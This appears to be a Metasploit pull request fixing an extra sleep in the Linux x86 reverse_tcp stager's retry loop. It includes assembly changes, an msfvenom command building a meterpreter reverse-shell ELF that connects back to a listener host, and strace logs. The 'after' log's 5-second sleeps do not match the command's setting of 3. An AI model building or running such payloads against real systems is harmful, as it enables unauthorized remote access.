### PR TITLE
fix extra sleep on linux x86 stager

### DIFF
--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -123,6 +123,8 @@ module Payload::Linux::ReverseTcp_x86
         jns mprotect
 
       handle_failure:
+        dec esi
+        jz failed
         push 0xa2
         pop eax
         push 0x#{sleep_nanoseconds.to_s(16)}
@@ -131,9 +133,7 @@ module Payload::Linux::ReverseTcp_x86
         xor ecx, ecx
         int 0x80                   ; sys_nanosleep
         test eax, eax
-        js failed
-        dec esi
-        jnz create_socket
+        jns create_socket
         jmp failed
     ^
 


### PR DESCRIPTION
The other day I added retry for linux x86 stager, but it involved extra stager by my mistake. sorry. 

## Verification
```
$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.132.1 LPORT=4444 ReverseConnectRetries=3 StagerRetryWait=3 -f elf -o "../reverse_tcp_test"
$ sudo chmod +x ./reverse_tcp_test
```

before:

```
$ strace ./reverse_tcp_test
execve("./reverse_tcp_test", ["./reverse_tcp_test"], [/* 74 vars */]) = 0
[ Process PID=18549 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0  // extra
_exit(1)                                = ?
+++ exited with 1 +++
```

after:

```
$ strace ./reverse_tcp_test
execve("./reverse_tcp_test", ["./reverse_tcp_test"], [/* 74 vars */]) = 0
[ Process PID=16887 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({5, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({5, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
_exit(1)                                = ?
+++ exited with 1 +++
```
